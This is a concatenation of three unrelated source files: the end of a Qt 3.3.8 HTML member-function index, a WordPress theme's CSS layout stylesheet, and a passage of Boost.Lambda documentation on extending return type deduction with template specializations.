<li><a href="qwidget.html#hasFocus">hasFocus</a>()
<li><a href="qwidget.html#hasMouse">hasMouse</a>()
<li><a href="qwidget.html#hasMouseTracking">hasMouseTracking</a>()
<li><a href="qscrollview.html#hasStaticBackground">hasStaticBackground</a>()
<li><a href="qlistview.html#header">header</a>()
<li><a href="qwidget.html#height">height</a>()
<li><a href="qwidget.html#heightForWidth">heightForWidth</a>()
<li><a href="qwidget.html#hide">hide</a>()
<li><a href="qlistview.html#hideColumn">hideColumn</a>()
<li><a href="qwidget.html#hideEvent">hideEvent</a>()
<li><a href="qobject.html#highPriority">highPriority</a>()
<li><a href="qscrollview.html#horizontalScrollBar">horizontalScrollBar</a>()
<li><a href="qscrollview.html#horizontalSliderPressed">horizontalSliderPressed</a>()
<li><a href="qscrollview.html#horizontalSliderReleased">horizontalSliderReleased</a>()
<li><a href="qwidget.html#icon">icon</a>()
<li><a href="qwidget.html#iconText">iconText</a>()
<li><a href="qwidget.html#iconify">iconify</a>()
<li><a href="qwidget.html#imComposeEvent">imComposeEvent</a>()
<li><a href="qwidget.html#imEndEvent">imEndEvent</a>()
<li><a href="qwidget.html#imStartEvent">imStartEvent</a>()
<li><a href="qobject.html#inherits">inherits</a>()
<li><a href="qobject.html#insertChild">insertChild</a>()
<li><a href="qlistview.html#insertItem">insertItem</a>()
<li><a href="qobject.html#installEventFilter">installEventFilter</a>()
<li><a href="qlistview.html#invertSelection">invertSelection</a>()
<li><a href="qobject.html#isA">isA</a>()
<li><a href="qwidget.html#isActiveWindow">isActiveWindow</a>()
<li><a href="qwidget.html#isDesktop">isDesktop</a>()
<li><a href="qwidget.html#isDialog">isDialog</a>()
<li><a href="qwidget.html#isEnabled">isEnabled</a>()
<li><a href="qwidget.html#isEnabledTo">isEnabledTo</a>()
<li><a href="qwidget.html#isEnabledToTLW">isEnabledToTLW</a>()
<li><a href="qpaintdevice.html#isExtDev">isExtDev</a>()
<li><a href="qwidget.html#isFocusEnabled">isFocusEnabled</a>()
<li><a href="qwidget.html#isFullScreen">isFullScreen</a>()
<li><a href="qwidget.html#isHidden">isHidden</a>()
<li><a href="qscrollview.html#isHorizontalSliderPressed">isHorizontalSliderPressed</a>()
<li><a href="qwidget.html#isInputMethodEnabled">isInputMethodEnabled</a>()
<li><a href="qwidget.html#isMaximized">isMaximized</a>()
<li><a href="qwidget.html#isMinimized">isMinimized</a>()
<li><a href="qwidget.html#isModal">isModal</a>()
<li><a href="qlistview.html#isMultiSelection">isMultiSelection</a>()
<li><a href="qlistview.html#isOpen">isOpen</a>()
<li><a href="qwidget.html#isPopup">isPopup</a>()
<li><a href="qlistview.html#isRenaming">isRenaming</a>()
<li><a href="qlistview.html#isSelected">isSelected</a>()
<li><a href="qwidget.html#isShown">isShown</a>()
<li><a href="qwidget.html#isTopLevel">isTopLevel</a>()
<li><a href="qwidget.html#isUpdatesEnabled">isUpdatesEnabled</a>()
<li><a href="qscrollview.html#isVerticalSliderPressed">isVerticalSliderPressed</a>()
<li><a href="qwidget.html#isVisible">isVisible</a>()
<li><a href="qwidget.html#isVisibleTo">isVisibleTo</a>()
<li><a href="qwidget.html#isVisibleToTLW">isVisibleToTLW</a>()
<li><a href="qobject.html#isWidgetType">isWidgetType</a>()
<li><a href="qlistview.html#itemAt">itemAt</a>()
<li><a href="qlistview.html#itemMargin">itemMargin</a>()
<li><a href="qlistview.html#itemPos">itemPos</a>()
<li><a href="qlistview.html#itemRect">itemRect</a>()
<li><a href="qlistview.html#itemRenamed">itemRenamed</a>()
<li><a href="qwidget.html#keyPressEvent">keyPressEvent</a>()
<li><a href="qwidget.html#keyReleaseEvent">keyReleaseEvent</a>()
<li><a href="qwidget.html#keyboardGrabber">keyboardGrabber</a>()
<li><a href="qobject.html#killTimer">killTimer</a>()
<li><a href="qobject.html#killTimers">killTimers</a>()
<li><a href="qlistview.html#lastItem">lastItem</a>()
<li><a href="qwidget.html#layout">layout</a>()
<li><a href="qwidget.html#leaveEvent">leaveEvent</a>()
<li><a href="qscrollview.html#leftMargin">leftMargin</a>()
<li><a href="qframe.html#lineWidth">lineWidth</a>()
<li><a href="qwidget.html#lower">lower</a>()
<li><a href="qwidget.html#macEvent">macEvent</a>()
<li><a href="qwidget.html#mapFrom">mapFrom</a>()
<li><a href="qwidget.html#mapFromGlobal">mapFromGlobal</a>()
<li><a href="qwidget.html#mapFromParent">mapFromParent</a>()
<li><a href="qwidget.html#mapTo">mapTo</a>()
<li><a href="qwidget.html#mapToGlobal">mapToGlobal</a>()
<li><a href="qwidget.html#mapToParent">mapToParent</a>()
<li><a href="qframe.html#margin">margin</a>()
<li><a href="qwidget.html#maximumHeight">maximumHeight</a>()
<li><a href="qwidget.html#maximumSize">maximumSize</a>()
<li><a href="qwidget.html#maximumWidth">maximumWidth</a>()
<li><a href="qobject.html#metaObject">metaObject</a>()
<li><a href="qwidget.html#metric">metric</a>()
<li><a href="qwidget.html#microFocusHint">microFocusHint</a>()
<li><a href="qframe.html#midLineWidth">midLineWidth</a>()
<li><a href="qwidget.html#minimumHeight">minimumHeight</a>()
<li><a href="qwidget.html#minimumSize">minimumSize</a>()
<li><a href="qwidget.html#minimumSizeHint">minimumSizeHint</a>()
<li><a href="qwidget.html#minimumWidth">minimumWidth</a>()
<li><a href="qlistview.html#mouseButtonClicked">mouseButtonClicked</a>()
<li><a href="qlistview.html#mouseButtonPressed">mouseButtonPressed</a>()
<li><a href="qwidget.html#mouseDoubleClickEvent">mouseDoubleClickEvent</a>()
<li><a href="qwidget.html#mouseGrabber">mouseGrabber</a>()
<li><a href="qwidget.html#mouseMoveEvent">mouseMoveEvent</a>()
<li><a href="qwidget.html#mousePressEvent">mousePressEvent</a>()
<li><a href="qwidget.html#mouseReleaseEvent">mouseReleaseEvent</a>()
<li><a href="qwidget.html#move">move</a>()
<li><a href="qscrollview.html#moveChild">moveChild</a>()
<li><a href="qwidget.html#moveEvent">moveEvent</a>()
<li><a href="qobject.html#name">name</a>()
<li><a href="qobject.html#normalizeSignalSlot">normalizeSignalSlot</a>()
<li><a href="qobject.html#objectTrees">objectTrees</a>()
<li><a href="qlistview.html#onItem">onItem</a>()
<li><a href="qlistview.html#onViewport">onViewport</a>()
<li><a href="qwidget.html#ownCursor">ownCursor</a>()
<li><a href="qwidget.html#ownFont">ownFont</a>()
<li><a href="qwidget.html#ownPalette">ownPalette</a>()
<li><a href="qlistview.html#paintEmptyArea">paintEmptyArea</a>()
<li><a href="qframe.html#paintEvent">paintEvent</a>()
<li><a href="qpaintdevice.html#paintingActive">paintingActive</a>()
<li><a href="qwidget.html#palette">palette</a>()
<li><a href="qwidget.html#paletteBackgroundColor">paletteBackgroundColor</a>()
<li><a href="qwidget.html#paletteBackgroundPixmap">paletteBackgroundPixmap</a>()
<li><a href="qwidget.html#paletteChange">paletteChange</a>()
<li><a href="qwidget.html#paletteForegroundColor">paletteForegroundColor</a>()
<li><a href="qobject.html#parent">parent</a>()
<li><a href="qwidget.html#parentWidget">parentWidget</a>()
<li><a href="qwidget.html#polish">polish</a>()
<li><a href="qwidget.html#pos">pos</a>()
<li><a href="qlistview.html#pressed">pressed</a>()
<li><a href="qobject.html#property">property</a>()
<li><a href="qobject.html#queryList">queryList</a>()
<li><a href="qwidget.html#qwsEvent">qwsEvent</a>()
<li><a href="qwidget.html#raise">raise</a>()
<li><a href="qwidget.html#recreate">recreate</a>()
<li><a href="qwidget.html#rect">rect</a>()
<li><a href="qwidget.html#releaseKeyboard">releaseKeyboard</a>()
<li><a href="qwidget.html#releaseMouse">releaseMouse</a>()
<li><a href="qscrollview.html#removeChild">removeChild</a>()
<li><a href="qlistview.html#removeColumn">removeColumn</a>()
<li><a href="qobject.html#removeEventFilter">removeEventFilter</a>()
<li><a href="qlistview.html#removeItem">removeItem</a>()
<li><a href="qwidget.html#repaint">repaint</a>()
<li><a href="qscrollview.html#repaintContents">repaintContents</a>()
<li><a href="qlistview.html#repaintItem">repaintItem</a>()
<li><a href="qwidget.html#reparent">reparent</a>()
<li><a href="qwidget.html#resetInputContext">resetInputContext</a>()
<li><a href="qwidget.html#resize">resize</a>()
<li><a href="qscrollview.html#resizeContents">resizeContents</a>()
<li><a href="qlistview.html#resizeEvent">resizeEvent</a>()
<li><a href="qlistview.html#resizeMode">resizeMode</a>()
<li><a href="qscrollview.html#resizePolicy">resizePolicy</a>()
<li><a href="qlistview.html#returnPressed">returnPressed</a>()
<li><a href="qlistview.html#rightButtonClicked">rightButtonClicked</a>()
<li><a href="qlistview.html#rightButtonPressed">rightButtonPressed</a>()
<li><a href="qscrollview.html#rightMargin">rightMargin</a>()
<li><a href="qlistview.html#rootIsDecorated">rootIsDecorated</a>()
<li><a href="qwidget.html#scroll">scroll</a>()
<li><a href="qscrollview.html#scrollBy">scrollBy</a>()
<li><a href="qlistview.html#selectAll">selectAll</a>()
<li><a href="qlistview.html#selectedItem">selectedItem</a>()
<li><a href="qlistview.html#selectionChanged">selectionChanged</a>()
<li><a href="qlistview.html#selectionMode">selectionMode</a>()
<li><a href="qobject.html#sender">sender</a>()
<li><a href="qwidget.html#setAcceptDrops">setAcceptDrops</a>()
<li><a href="qwidget.html#setActiveWindow">setActiveWindow</a>()
<li><a href="qlistview.html#setAllColumnsShowFocus">setAllColumnsShowFocus</a>()
<li><a href="qwidget.html#setAutoMask">setAutoMask</a>()
<li><a href="qwidget.html#setBackgroundColor">setBackgroundColor</a>()
<li><a href="qwidget.html#setBackgroundMode">setBackgroundMode</a>()
<li><a href="qwidget.html#setBackgroundOrigin">setBackgroundOrigin</a>()
<li><a href="qwidget.html#setBackgroundPixmap">setBackgroundPixmap</a>()
<li><a href="qwidget.html#setBaseSize">setBaseSize</a>()
<li><a href="qwidget.html#setCaption">setCaption</a>()
<li><a href="qlistview.html#setColumnAlignment">setColumnAlignment</a>()
<li><a href="qlistview.html#setColumnText">setColumnText</a>()
<li><a href="qlistview.html#setColumnWidth">setColumnWidth</a>()
<li><a href="qlistview.html#setColumnWidthMode">setColumnWidthMode</a>()
<li><a href="qscrollview.html#setContentsPos">setContentsPos</a>()
<li><a href="qscrollview.html#setCornerWidget">setCornerWidget</a>()
<li><a href="qlistview.html#setCurrentItem">setCurrentItem</a>()
<li><a href="qwidget.html#setCursor">setCursor</a>()
<li><a href="qlistview.html#setDefaultRenameAction">setDefaultRenameAction</a>()
<li><a href="qwidget.html#setDisabled">setDisabled</a>()
<li><a href="qscrollview.html#setDragAutoScroll">setDragAutoScroll</a>()
<li><a href="qwidget.html#setEnabled">setEnabled</a>()
<li><a href="qwidget.html#setEraseColor">setEraseColor</a>()
<li><a href="qwidget.html#setErasePixmap">setErasePixmap</a>()
<li><a href="qwidget.html#setFixedHeight">setFixedHeight</a>()
<li><a href="qwidget.html#setFixedSize">setFixedSize</a>()
<li><a href="qwidget.html#setFixedWidth">setFixedWidth</a>()
<li><a href="qwidget.html#setFocus">setFocus</a>()
<li><a href="qwidget.html#setFocusPolicy">setFocusPolicy</a>()
<li><a href="qwidget.html#setFocusProxy">setFocusProxy</a>()
<li><a href="qwidget.html#setFont">setFont</a>()
<li><a href="qframe.html#setFrameRect">setFrameRect</a>()
<li><a href="qframe.html#setFrameShadow">setFrameShadow</a>()
<li><a href="qframe.html#setFrameShape">setFrameShape</a>()
<li><a href="qframe.html#setFrameStyle">setFrameStyle</a>()
<li><a href="qwidget.html#setGeometry">setGeometry</a>()
<li><a href="qscrollview.html#setHBarGeometry">setHBarGeometry</a>()
<li><a href="qscrollview.html#setHScrollBarMode">setHScrollBarMode</a>()
<li><a href="qwidget.html#setHidden">setHidden</a>()
<li><a href="qwidget.html#setIcon">setIcon</a>()
<li><a href="qwidget.html#setIconText">setIconText</a>()
<li><a href="qwidget.html#setInputMethodEnabled">setInputMethodEnabled</a>()
<li><a href="qlistview.html#setItemMargin">setItemMargin</a>()
<li><a href="qwidget.html#setKeyCompression">setKeyCompression</a>()
<li><a href="qframe.html#setLineWidth">setLineWidth</a>()
<li><a href="qframe.html#setMargin">setMargin</a>()
<li><a href="qscrollview.html#setMargins">setMargins</a>()
<li><a href="qwidget.html#setMask">setMask</a>()
<li><a href="qwidget.html#setMaximumHeight">setMaximumHeight</a>()
<li><a href="qwidget.html#setMaximumSize">setMaximumSize</a>()
<li><a href="qwidget.html#setMaximumWidth">setMaximumWidth</a>()
<li><a href="qwidget.html#setMicroFocusHint">setMicroFocusHint</a>()
<li><a href="qframe.html#setMidLineWidth">setMidLineWidth</a>()
<li><a href="qwidget.html#setMinimumHeight">setMinimumHeight</a>()
<li><a href="qwidget.html#setMinimumSize">setMinimumSize</a>()
<li><a href="qwidget.html#setMinimumWidth">setMinimumWidth</a>()
<li><a href="qwidget.html#setMouseTracking">setMouseTracking</a>()
<li><a href="qlistview.html#setMultiSelection">setMultiSelection</a>()
<li><a href="qobject.html#setName">setName</a>()
<li><a href="qlistview.html#setOpen">setOpen</a>()
<li><a href="qwidget.html#setPalette">setPalette</a>()
<li><a href="qwidget.html#setPaletteBackgroundColor">setPaletteBackgroundColor</a>()
<li><a href="qwidget.html#setPaletteBackgroundPixmap">setPaletteBackgroundPixmap</a>()
<li><a href="qwidget.html#setPaletteForegroundColor">setPaletteForegroundColor</a>()
<li><a href="qobject.html#setProperty">setProperty</a>()
<li><a href="qlistview.html#setResizeMode">setResizeMode</a>()
<li><a href="qscrollview.html#setResizePolicy">setResizePolicy</a>()
<li><a href="qlistview.html#setRootIsDecorated">setRootIsDecorated</a>()
<li><a href="qlistview.html#setSelected">setSelected</a>()
<li><a href="qlistview.html#setSelectionAnchor">setSelectionAnchor</a>()
<li><a href="qlistview.html#setSelectionMode">setSelectionMode</a>()
<li><a href="qlistview.html#setShowSortIndicator">setShowSortIndicator</a>()
<li><a href="qlistview.html#setShowToolTips">setShowToolTips</a>()
<li><a href="qwidget.html#setShown">setShown</a>()
<li><a href="qwidget.html#setSizeIncrement">setSizeIncrement</a>()
<li><a href="qwidget.html#setSizePolicy">setSizePolicy</a>()
<li><a href="qlistview.html#setSortColumn">setSortColumn</a>()
<li><a href="qlistview.html#setSortOrder">setSortOrder</a>()
<li><a href="qlistview.html#setSorting">setSorting</a>()
<li><a href="qscrollview.html#setStaticBackground">setStaticBackground</a>()
<li><a href="qwidget.html#setStyle">setStyle</a>()
<li><a href="qwidget.html#setTabOrder">setTabOrder</a>()
<li><a href="qlistview.html#setTreeStepSize">setTreeStepSize</a>()
<li><a href="qwidget.html#setUpdatesEnabled">setUpdatesEnabled</a>()
<li><a href="qscrollview.html#setVBarGeometry">setVBarGeometry</a>()
<li><a href="qscrollview.html#setVScrollBarMode">setVScrollBarMode</a>()
<li><a href="qwidget.html#setWFlags">setWFlags</a>()
<li><a href="qwidget.html#setWindowOpacity">setWindowOpacity</a>()
<li><a href="qwidget.html#setWindowState">setWindowState</a>()
<li><a href="qwidget.html#show">show</a>()
<li><a href="qscrollview.html#showChild">showChild</a>()
<li><a href="qwidget.html#showEvent">showEvent</a>()
<li><a href="qwidget.html#showFullScreen">showFullScreen</a>()
<li><a href="qwidget.html#showMaximized">showMaximized</a>()
<li><a href="qwidget.html#showMinimized">showMinimized</a>()
<li><a href="qwidget.html#showNormal">showNormal</a>()
<li><a href="qlistview.html#showSortIndicator">showSortIndicator</a>()
<li><a href="qlistview.html#showToolTips">showToolTips</a>()
<li><a href="qobject.html#signalsBlocked">signalsBlocked</a>()
<li><a href="qwidget.html#size">size</a>()
<li><a href="qwidget.html#sizeHint">sizeHint</a>()
<li><a href="qwidget.html#sizeIncrement">sizeIncrement</a>()
<li><a href="qwidget.html#sizePolicy">sizePolicy</a>()
<li><a href="qlistview.html#sort">sort</a>()
<li><a href="qlistview.html#sortColumn">sortColumn</a>()
<li><a href="qlistview.html#sortOrder">sortOrder</a>()
<li><a href="qlistview.html#spacePressed">spacePressed</a>()
<li><a href="qwidget.html#stackUnder">stackUnder</a>()
<li><a href="qlistview.html#startDrag">startDrag</a>()
<li><a href="qobject.html#startTimer">startTimer</a>()
<li><a href="qwidget.html#style">style</a>()
<li><a href="qwidget.html#styleChange">styleChange</a>()
<li><a href="qwidget.html#tabletEvent">tabletEvent</a>()
<li><a href="qlistview.html#takeItem">takeItem</a>()
<li><a href="qwidget.html#testWFlags">testWFlags</a>()
<li><a href="qobject.html#timerEvent">timerEvent</a>()
<li><a href="qwidget.html#topLevelWidget">topLevelWidget</a>()
<li><a href="qscrollview.html#topMargin">topMargin</a>()
<li><a href="qobject.html#tr">tr</a>()
<li><a href="qobject.html#trUtf8">trUtf8</a>()
<li><a href="qlistview.html#treeStepSize">treeStepSize</a>()
<li><a href="qlistview.html#triggerUpdate">triggerUpdate</a>()
<li><a href="qwidget.html#unsetCursor">unsetCursor</a>()
<li><a href="qwidget.html#unsetFont">unsetFont</a>()
<li><a href="qwidget.html#unsetPalette">unsetPalette</a>()
<li><a href="qwidget.html#update">update</a>()
<li><a href="qlistview.html#updateContents">updateContents</a>()
<li><a href="qwidget.html#updateGeometry">updateGeometry</a>()
<li><a href="qwidget.html#updateMask">updateMask</a>()
<li><a href="qscrollview.html#updateScrollBars">updateScrollBars</a>()
<li><a href="qscrollview.html#vScrollBarMode">vScrollBarMode</a>()
<li><a href="qscrollview.html#verticalScrollBar">verticalScrollBar</a>()
<li><a href="qscrollview.html#verticalSliderPressed">verticalSliderPressed</a>()
<li><a href="qscrollview.html#verticalSliderReleased">verticalSliderReleased</a>()
<li><a href="qscrollview.html#viewport">viewport</a>()
<li><a href="qscrollview.html#viewportPaintEvent">viewportPaintEvent</a>()
<li><a href="qscrollview.html#viewportResizeEvent">viewportResizeEvent</a>()
<li><a href="qscrollview.html#viewportSize">viewportSize</a>()
<li><a href="qscrollview.html#viewportToContents">viewportToContents</a>()
<li><a href="qscrollview.html#visibleHeight">visibleHeight</a>()
<li><a href="qwidget.html#visibleRect">visibleRect</a>()
<li><a href="qscrollview.html#visibleWidth">visibleWidth</a>()
<li><a href="qwidget.html#wheelEvent">wheelEvent</a>()
<li><a href="qwidget.html#width">width</a>()
<li><a href="qwidget.html#winEvent">winEvent</a>()
<li><a href="qwidget.html#winId">winId</a>()
<li><a href="qwidget.html#windowActivationChange">windowActivationChange</a>()
<li><a href="qwidget.html#windowOpacity">windowOpacity</a>()
<li><a href="qwidget.html#windowState">windowState</a>()
<li><a href="qwidget.html#x">x</a>()
<li><a href="qpaintdevice.html#x11AppCells">x11AppCells</a>()
<li><a href="qpaintdevice.html#x11AppColormap">x11AppColormap</a>()
<li><a href="qpaintdevice.html#x11AppDefaultColormap">x11AppDefaultColormap</a>()
<li><a href="qpaintdevice.html#x11AppDefaultVisual">x11AppDefaultVisual</a>()
<li><a href="qpaintdevice.html#x11AppDepth">x11AppDepth</a>()
<li><a href="qpaintdevice.html#x11AppDisplay">x11AppDisplay</a>()
<li><a href="qpaintdevice.html#x11AppDpiX">x11AppDpiX</a>()
<li><a href="qpaintdevice.html#x11AppDpiY">x11AppDpiY</a>()
<li><a href="qpaintdevice.html#x11AppRootWindow">x11AppRootWindow</a>()
<li><a href="qpaintdevice.html#x11AppScreen">x11AppScreen</a>()
<li><a href="qpaintdevice.html#x11AppVisual">x11AppVisual</a>()
<li><a href="qpaintdevice.html#x11Cells">x11Cells</a>()
<li><a href="qpaintdevice.html#x11Colormap">x11Colormap</a>()
<li><a href="qpaintdevice.html#x11DefaultColormap">x11DefaultColormap</a>()
<li><a href="qpaintdevice.html#x11DefaultVisual">x11DefaultVisual</a>()
<li><a href="qpaintdevice.html#x11Depth">x11Depth</a>()
<li><a href="qpaintdevice.html#x11Display">x11Display</a>()
<li><a href="qwidget.html#x11Event">x11Event</a>()
<li><a href="qpaintdevice.html#x11Screen">x11Screen</a>()
<li><a href="qpaintdevice.html#x11SetAppDpiX">x11SetAppDpiX</a>()
<li><a href="qpaintdevice.html#x11SetAppDpiY">x11SetAppDpiY</a>()
<li><a href="qpaintdevice.html#x11Visual">x11Visual</a>()
<li><a href="qwidget.html#y">y</a>()
</ul>
<!-- eof -->
<p><address><hr><div align=center>
<table width=100% cellspacing=0 border=0><tr>
<td>Copyright © 2007
<a href="troll.html">Trolltech</a><td align=center><a href="trademarks.html">Trademarks</a>
<td align=right><div align=right>Qt 3.3.8</div>
</table></div></address></body>
</html>
|
wp-content/themes/the-bootstrap/css/claymore.css | cphillipp/michiganatm | body {position:relative;}
#footer-sidebar {margin:0 auto; padding:50px 0 0; width:100%; overflow:hidden;}
#footer-sidebar1 {width:48%; margin-right:2%; float:left; text-align:center;}
#footer-sidebar2 {width:48%; margin-right:2%; float:left; text-align:center;}
#footer-sidebar textarea {width:255px; height:100px;}
#footer-sidebar input[type="submit"] {padding:4px 20px; color:#FFF; text-transform:uppercase; border:none; background:#48b759; -webkit-border-radius:4px; -moz-border-radius:4px; border-radius:4px; -webkit-box-shadow:1px 1px 5px #000; -moz-box-shadow:1px 1px 5px #000; box-shadow:1px 1px 5px #000;}
span.wpcf7-not-valid-tip {color:#000;}
body>.container {margin:0 auto;}
body .page-header {display:none;}
body.home h1 {clear:none;}
#page {padding:0; background:transparent;}
#branding {height:142px; line-height:142px;}
#header-image {margin:0; float:left;}
#access {float:right; margin:52px 0 0;}
.navbar {margin:0;}
.navbar-inverse .navbar-inner {background:none; border:none; -webkit-box-shadow:0 0 0 #fff; -moz-box-shadow:0 0 0 #fff; box-shadow:0 0 0 #fff;}
.navbar-inverse .brand,
.navbar-inverse .nav>li>a {color:#1cb434; text-shadow:0 0 0 #FFF; text-transform:uppercase; font-weight:bold;}
.navbar-inverse .nav>li>a:focus,
.navbar-inverse .nav>li>a:hover {color:#21784f;}
.navbar-inverse .nav .active>a,
.navbar-inverse .nav .active>a:hover,
.navbar-inverse .nav .active>a:focus {color:#21784f; background:transparent; -webkit-box-shadow:0 0 0 #fff; -moz-box-shadow:0 0 0 #fff; box-shadow:0 0 0 #fff;}
.thumbnail {padding:0; border:0px solid #ddd; -webkit-border-radius:0; -moz-border-radius:0;border-radius:0; -webkit-box-shadow:0 0 0 rgba(0, 0, 0, 0.055); -moz-box-shadow:0 0 0 rgba(0, 0, 0, 0.055); box-shadow:0 0 0 rgba(0, 0, 0, 0.055);}
.green {display:block; margin:0; padding:0; width:100%; height:370px; position:absolute; top:142px; z-index:-1; background:url('../img/green-back.png') repeat-x;}
body.page.home .green {height:370px; border:none; background:url('../img/green-back.png') repeat-x; -webkit-box-shadow:none; -moz-box-shadow:none; box-shadow:none;}
body.page.home .green .top-point {top:-30px;}
body.page.home .green .bottom-point {display:block;}
body.page .green {background:transparent; height:auto; border-top:4px solid #b7b7b7; -webkit-box-shadow:0px 5px 15px #666; -moz-box-shadow:0px 5px 15px #666; box-shadow:0px 5px 15px #666;}
body.page .green .top-point {top:-34px;}
body.page .green .bottom-point {display:none;}
.green .top-point {margin:0 0 0 -218.5px; padding:0; width:437px; height:33px; position:absolute; top:-30px; left:50%; background:url('../img/top-point.png') no-repeat;}
.green .bottom-point {margin:0 0 0 -371.5px; padding:0; width:743px; height:54px; position:absolute; bottom:-51px; left:50%; background:url('../img/bottom-point.png') no-repeat;}
.banner {overflow:hidden;}
.atm {margin:18px 20px 50px 90px;}
.shortcode1-3 {width:31.33%; margin-right:2%; float:left;}
.shortcode1-2 {width:48%; margin-right:2%; float:left;}
.green-footer {margin:0; padding:0; width:100%; background:#20a834; -webkit-box-shadow:inset 0 15px 40px -15px #000; -moz-box-shadow:inset 0 15px 40px -15px #000; box-shadow:inset 0 15px 40px -15px #000;}
#colophon {margin:0 auto; float:none; overflow:hidden; color:#FFF;}
#colophon a {color:#FFF;}
#page-footer {background-color:transparent; border:none; -webkit-box-shadow:none; -moz-box-shadow:none; box-shadow:none;}
@media (max-width: 979px) and (min-width: 0px) {
.special-hide {display:none;}
}
@media (max-width: 979px) and (min-width: 768px) {
#branding {height:auto;}
.navbar-inverse .navbar-inner {background:#000;}
}
@media (max-width: 767px) {
#branding {height:auto;}
#access {float:none; margin:0; clear:both;}
.navbar-inverse .navbar-inner {background:#000;}
body.home .green {display:none;}
.banner {display:none;}
.shortcode1-3 {width:100%; margin-right:0%; float:none;}
.shortcode1-3 img {margin:0 auto;}
.shortcode1-2 {width:100%; margin-right:0%; float:none;}
#footer-sidebar1 {width:100%; margin-right:0%; float:none;}
#footer-sidebar2 {width:100%; margin-right:0%; float:none;}
} |
lib/boost/boost_1_38_0/doc/html/lambda/extending.html | scs/uclinux | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Extending return type deduction system</title>
<link rel="stylesheet" href="../boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.73.2">
<link rel="start" href="../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset">
<link rel="up" href="../lambda.html" title="Chapter 11. Boost.Lambda">
<link rel="prev" href="le_in_details.html" title="Lambda expressions in details">
<link rel="next" href="s07.html" title="Practical considerations">
</head>
<body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF">
<table cellpadding="2" width="100%"><tr>
<td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../boost.png"></td>
<td align="center"><a href="../../../index.html">Home</a></td>
<td align="center"><a href="../../../libs/libraries.htm">Libraries</a></td>
<td align="center"><a href="http://www.boost.org/users/people.html">People</a></td>
<td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td>
<td align="center"><a href="../../../more/index.htm">More</a></td>
</tr></table>
<hr>
<div class="spirit-nav">
<a accesskey="p" href="le_in_details.html"><img src="../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../lambda.html"><img src="../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../index.html"><img src="../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="s07.html"><img src="../../../doc/html/images/next.png" alt="Next"></a>
</div>
<div class="section" lang="en">
<div class="titlepage"><div><div><h2 class="title" style="clear: both">
<a name="lambda.extending"></a>Extending return type deduction system</h2></div></div></div>
<p>
In this section, we explain how to extend the return type deduction system
to cover user defined operators.
In many cases this is not necessary,
as the BLL defines default return types for operators.
For example, the default return type for all comparison operators is
<code class="literal">bool</code>, and as long as the user defined comparison operators
have a bool return type, there is no need to write new specializations
for the return type deduction classes.
Sometimes this cannot be avoided, though.
</p>
<p>
The overloadable user defined operators are either unary or binary.
For each arity, there are two traits templates that define the
return types of the different operators.
Hence, the return type system can be extended by providing more
specializations for these templates.
The templates for unary functors are
<code class="literal">
plain_return_type_1<Action, A>
</code>
and
<code class="literal">
return_type_1<Action, A>
</code>, and
<code class="literal">
plain_return_type_2<Action, A, B>
</code>
and
<code class="literal">
return_type_2<Action, A, B>
</code>
respectively for binary functors.
</p>
<p>
The first parameter (<code class="literal">Action</code>) to all these templates
is the <span class="emphasis"><em>action</em></span> class, which specifies the operator.
Operators with similar return type rules are grouped together into
<span class="emphasis"><em>action groups</em></span>,
and only the action class and action group together define the operator
unambiguously.
As an example, the action type
<code class="literal">arithmetic_action<plus_action></code> stands for
<code class="literal">operator+</code>.
The complete listing of different action types is shown in
<a class="xref" href="extending.html#table:actions" title="Table 11.2. Action types">Table 11.2, “Action types”</a>.
</p>
<p>
The latter parameters, <code class="literal">A</code> in the unary case,
or <code class="literal">A</code> and <code class="literal">B</code> in the binary case,
stand for the argument types of the operator call.
The two sets of templates,
<code class="literal">plain_return_type_<em class="parameter"><code>n</code></em></code> and
<code class="literal">return_type_<em class="parameter"><code>n</code></em></code>
(<em class="parameter"><code>n</code></em> is 1 or 2) differ in the way how parameter types
are presented to them.
For the former templates, the parameter types are always provided as
non-reference types, and do not have const or volatile qualifiers.
This makes specializing easy, as commonly one specialization for each
user defined operator, or operator group, is enough.
On the other hand, if a particular operator is overloaded for different
cv-qualifications of the same argument types,
and the return types of these overloaded versions differ, a more fine-grained control is needed.
Hence, for the latter templates, the parameter types preserve the
cv-qualifiers, and are non-reference types as well.
The downside is, that for an overloaded set of operators of the
kind described above, one may end up needing up to
16 <code class="literal">return_type_2</code> specializations.
</p>
<p>
Suppose the user has overloaded the following operators for some user defined
types <code class="literal">X</code>, <code class="literal">Y</code> and <code class="literal">Z</code>:
</p>
<pre class="programlisting">
Z operator+(const X&, const Y&);
Z operator-(const X&, const Y&);
</pre>
<p>
Now, one can add a specialization stating, that if the left hand argument
is of type <code class="literal">X</code>, and the right hand one of type
<code class="literal">Y</code>, the return type of all such binary arithmetic
operators is <code class="literal">Z</code>:
</p>
<pre class="programlisting">
namespace boost {
namespace lambda {
template<class Act>
struct plain_return_type_2<arithmetic_action<Act>, X, Y> {
typedef Z type;
};
}
}
</pre>
<p>
Having this specialization defined, BLL is capable of correctly
deducing the return type of the above two operators.
Note, that the specializations must be in the same namespace,
<code class="literal">::boost::lambda</code>, with the primary template.
For brevity, we do not show the namespace definitions in the examples below.
</p>
<p>
It is possible to specialize on the level of an individual operator as well,
in addition to providing a specialization for a group of operators.
Say, we add a new arithmetic operator for argument types <code class="literal">X</code>
and <code class="literal">Y</code>:
</p>
<pre class="programlisting">
X operator*(const X&, const Y&);
</pre>
<p>
Our first rule for all arithmetic operators specifies that the return
type of this operator is <code class="literal">Z</code>,
which obviously is not the case.
Hence, we provide a new rule for the multiplication operator:
</p>
<pre class="programlisting">
template<>
struct plain_return_type_2<arithmetic_action<multiply_action>, X, Y> {
typedef X type;
};
</pre>
<p>
</p>
<p>
The specializations can define arbitrary mappings from the argument types
to the return type.
Suppose we have some mathematical vector type, templated on the element type:
</p>
<pre class="programlisting">
template <class T> class my_vector;
</pre>
<p>
Suppose the addition operator is defined between any two
<code class="literal">my_vector</code> instantiations,
as long as the addition operator is defined between their element types.
Furthermore, the element type of the resulting <code class="literal">my_vector</code>
is the same as the result type of the addition between the element types.
